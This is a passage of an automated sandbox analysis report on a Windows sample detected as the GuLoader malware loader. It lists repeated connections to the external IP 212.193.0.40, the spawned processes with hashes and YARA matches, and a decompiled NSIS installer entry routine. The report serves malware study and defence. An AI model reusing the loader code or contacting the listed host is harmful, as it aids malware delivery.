Aug 5, 2022 14:09:29.587294102 CEST	49768	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:37.601310968 CEST	49768	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:44.633246899 CEST	49770	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:45.646311998 CEST	49770	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:47.661587000 CEST	49770	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:51.676271915 CEST	49770	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:09:59.690076113 CEST	49770	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:06.721107006 CEST	49771	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:07.735119104 CEST	49771	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:09.750307083 CEST	49771	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:13.765036106 CEST	49771	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:21.778992891 CEST	49771	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:28.810158968 CEST	49772	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:29.824213982 CEST	49772	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:31.839329958 CEST	49772	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:35.853876114 CEST	49772	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:43.867840052 CEST	49772	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:50.899960995 CEST	49773	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:51.912887096 CEST	49773	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:53.928108931 CEST	49773	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:10:57.942816019 CEST	49773	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:05.956773043 CEST	49773	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:12.987570047 CEST	49775	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:14.001897097 CEST	49775	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:16.017164946 CEST	49775	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:20.031699896 CEST	49775	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:28.045557976 CEST	49775	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:35.076654911 CEST	49776	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:36.090778112 CEST	49776	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:38.106137991 CEST	49776	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:42.120623112 CEST	49776	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:50.134536028 CEST	49776	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:57.166372061 CEST	49777	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:11:58.164046049 CEST	49777	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:00.179128885 CEST	49777	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:04.194000959 CEST	49777	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:12.207859039 CEST	49777	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:19.240605116 CEST	49778	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:20.252856970 CEST	49778	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:22.268033028 CEST	49778	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:26.282752991 CEST	49778	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:34.296644926 CEST	49778	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:41.328217983 CEST	49779	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:42.341773033 CEST	49779	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:44.357043982 CEST	49779	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:48.371671915 CEST	49779	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:12:56.385699987 CEST	49779	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:03.417860031 CEST	49780	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:04.430660009 CEST	49780	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:06.445909023 CEST	49780	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:10.460551977 CEST	49780	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:18.474405050 CEST	49780	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:25.508054972 CEST	49788	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:26.519665956 CEST	49788	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:28.534674883 CEST	49788	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:32.549573898 CEST	49788	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:40.563359022 CEST	49788	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:47.595875025 CEST	49789	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:48.608536005 CEST	49789	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:50.623610020 CEST	49789	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:13:54.638317108 CEST	49789	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:02.652225971 CEST	49789	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:09.687903881 CEST	49796	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:10.697413921 CEST	49796	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:12.712574959 CEST	49796	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:16.727325916 CEST	49796	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:24.741096020 CEST	49796	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:31.774460077 CEST	49797	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:32.786245108 CEST	49797	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:34.801412106 CEST	49797	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:38.816270113 CEST	49797	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:46.830014944 CEST	49797	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:53.863142014 CEST	49798	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:54.875081062 CEST	49798	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:14:56.890398979 CEST	49798	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:00.905045986 CEST	49798	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:08.919045925 CEST	49798	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:15.954130888 CEST	49799	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:16.964126110 CEST	49799	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:18.979290009 CEST	49799	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:22.994052887 CEST	49799	80	192.168.11.20	212.193.0.40
Aug 5, 2022 14:15:31.007947922 CEST	49799	80	192.168.11.20	212.193.0.40

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: xKBLVUHoY6.exePID: 8532, Parent PID: 7312

General

Target ID:	0
Start time:	14:07:07
Start date:	05/08/2022
Path:	C:\Users\user\Desktop\xKBLVUHoY6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xKBLVUHoY6.exe"
Imagebase:	0x400000
File size:	314680 bytes
MD5 hash:	6E0BF5D5220FBE4F7245653A259C7DAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1475620205.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 8740, Parent PID: 8532

General

Target ID:	3
Start time:	14:07:21
Start date:	05/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\xKBLVUHoY6.exe"
Imagebase:	0xe50000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.817511706.0000000001230000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.5715131175.0000000001230000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8764, Parent PID: 8740

General

Target ID:	4
Start time:	14:07:21
Start date:	05/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff750a30000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: xKBLVUHoY6.exePID: 8532, Parent PID: 7312COMMON

Execution Graph

Execution Coverage:	18.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.3%
Total number of Nodes:	1605
Total number of Limit Nodes:	37

Executed Functions

Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a2d8 = _v324.dwBuildNumber;
				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a2de != 0x600) {
					_t180 = E004068D4(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406864(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068D4(0xb);
				 *0x42a224 = E004068D4(9);
				_t88 = E004068D4(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a2dc =  *0x42a2dc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a2e0 = _t88;
				SHGetFileInfoW(0x4216c8, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406507(0x429220, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" ";
				E00406507(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a220 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405E03(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E03(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406507(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034C6(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403ADC();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2b4 == _t189) {
														L77:
														_t120 =  *0x42a2cc;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068D4(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B67(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a23c == _t189) {
												L51:
												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
												_v24 = E00403BB6(_t265);
												goto L68;
											}
											_t219 = E00405E03(L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" ") {
													_t190 = E00405AD2(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AB5();
														} else {
															E00405A38();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially"; // 0x43
														if(__eflags == 0) {
															E00406507(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially", _t220);
														}
														E00406507(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
															DeleteFileW(0x420ec8);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe", 0x420ec8, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062C7(_t202, 0x420ec8, 0);
																	E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
																	_t153 = E00405AEA(0x420ec8);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062C7(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EDE(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406507(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially", _t222);
												E00406507(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\xKBLVUHoY6.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034C6(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034C6(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a2c0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x00403505
0x00403506
0x0040350d
0x00403510
0x00403517
0x0040351a
0x0040352d
0x00403533
0x00403536
0x00403539
0x00403547
0x0040354f
0x0040355a
0x00403573
0x00403575
0x0040357d
0x0040357d
0x00403588
0x0040358a
0x0040358a
0x0040359f
0x004035c4
0x004035d2
0x004035d5
0x004035dc
0x004035e3
0x004035e3
0x004035dc
0x004035e5
0x004035ea
0x004035eb
0x004035f7
0x004035fb
0x00403602
0x00403610
0x00403615
0x0040361c
0x00403620
0x00403624
0x00403626
0x00403626
0x00403624
0x0040362d
0x00403634
0x0040363a
0x00403652
0x00403662
0x00403667
0x0040366d
0x00403674
0x0040367b
0x0040367d
0x0040367e
0x00403688
0x0040368f
0x00403691
0x00403693
0x00403693
0x004036a6
0x004036a8
0x004037a2
0x004037a2
0x004037a5
0x004037a8
0x00000000
0x00000000
0x004036b2
0x004036b3
0x004036b6
0x004036bf
0x004036bf
0x004036c2
0x004036c5
0x004036c8
0x004036cb
0x004036cb
0x004036cb
0x004036cc
0x004036d0
0x00403790
0x00403799
0x0040379b
0x0040379e
0x004037a1
0x004037a1
0x004037a1
0x00000000
0x004036d6
0x004036d7
0x004036d8
0x004036dc
0x004036f6
0x004036fd
0x00403710
0x00403711
0x00403726
0x0040372b
0x0040372d
0x0040372f
0x0040374b
0x00403752
0x00403765
0x00403766
0x0040377b
0x00403781
0x00403783
0x00403785
0x0040378d
0x0040378f
0x00000000
0x0040378f
0x00403789
0x0040378b
0x004037b0
0x004037b4
0x004037bd
0x004037c2
0x004037c8
0x004037d3
0x004037d5
0x004037da
0x004037dc
0x00403834
0x00403839
0x00403842
0x00403849
0x0040384c
0x00403a23
0x00403a23
0x00403a28
0x00403a31
0x00403a4e
0x00403ac6
0x00403ac6
0x00403ace
0x00403ad0
0x00403ad0
0x00403ad6
0x00403ad6
0x00403a65
0x00403a71
0x00403a82
0x00403a89
0x00403a90
0x00403a90
0x00403a98
0x00403aa4
0x00403ab2
0x00403abd
0x00000000
0x00000000
0x00000000
0x00403aa6
0x00403aa6
0x00403aa7
0x00403aa9
0x00403aaa
0x00403aab
0x00403ab0
0x00403abf
0x00403ac1
0x00000000
0x00403ac1
0x00000000
0x00403ab0
0x00403aa4
0x00403a3b
0x00403a42
0x00403a42
0x00403858
0x004038ff
0x004038ff
0x0040390b
0x00000000
0x0040390b
0x00403869
0x00403871
0x004038c3
0x004038c3
0x004038c9
0x004038d0
0x0040391e
0x00403920
0x00403925
0x00403927
0x0040392f
0x0040392f
0x0040393a
0x0040393f
0x00403946
0x0040394c
0x0040394e
0x00403a21
0x00403a21
0x00403a21
0x00000000
0x00403954
0x00403954
0x00403956
0x00403957
0x00403960
0x00403959
0x00403959
0x00403959
0x00403966
0x0040396e
0x00403975
0x0040397d
0x0040397d
0x0040398a
0x00403996
0x004039a0
0x004039a0
0x004039a2
0x004039a9
0x004039b3
0x004039bf
0x004039c5
0x004039cb
0x004039ce
0x004039d8
0x004039de
0x004039e0
0x004039e4
0x004039f5
0x004039fb
0x00403a00
0x00403a02
0x00403a05
0x00403a0b
0x00403a0b
0x00403a02
0x004039e0
0x00403a0e
0x00403a15
0x00403a15
0x00403a15
0x00403a15
0x00403a1c
0x00000000
0x00403a1c
0x0040394e
0x004038d2
0x004038d5
0x004038d9
0x004038de
0x004038e0
0x00000000
0x00000000
0x004038ec
0x004038f7
0x004038fc
0x00000000
0x004038fc
0x0040387a
0x00403892
0x004038a3
0x004038a4
0x004038a8
0x004038aa
0x004038b8
0x004038bf
0x00000000
0x00000000
0x00000000
0x004038bf
0x004038c1
0x00000000
0x004038c1
0x004037e4
0x004037f0
0x004037f5
0x004037fa
0x004037fc
0x00000000
0x00000000
0x00403804
0x0040380c
0x0040381d
0x00403825
0x00403827
0x0040382c
0x0040382e
0x00000000
0x00000000
0x00000000
0x0040382e
0x00000000
0x0040378b
0x00403734
0x00403736
0x00000000
0x00000000
0x00403738
0x0040373c
0x00403740
0x00403747
0x00403747
0x00403747
0x00403747
0x00000000
0x00403747
0x00403742
0x00403745
0x00000000
0x00000000
0x00000000
0x00403745
0x004036de
0x004036e2
0x004036e5
0x004036ec
0x004036ec
0x00000000
0x004036ec
0x004036e7
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036b8
0x004036b8
0x004036b9
0x004036ba
0x004036ba
0x00000000
0x004036b8
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,"C:\Users\user\Desktop\xKBLVUHoY6.exe" ,00000020,"C:\Users\user\Desktop\xKBLVUHoY6.exe" ,00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
DeleteFileW.KERNELBASE(1033), ref: 00403839
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xKBLVUHoY6.exe" ,00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(C:\Users\user\Desktop\xKBLVUHoY6.exe,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially, xrefs: 004037B8, 004038E7, 0040396E, 00403978
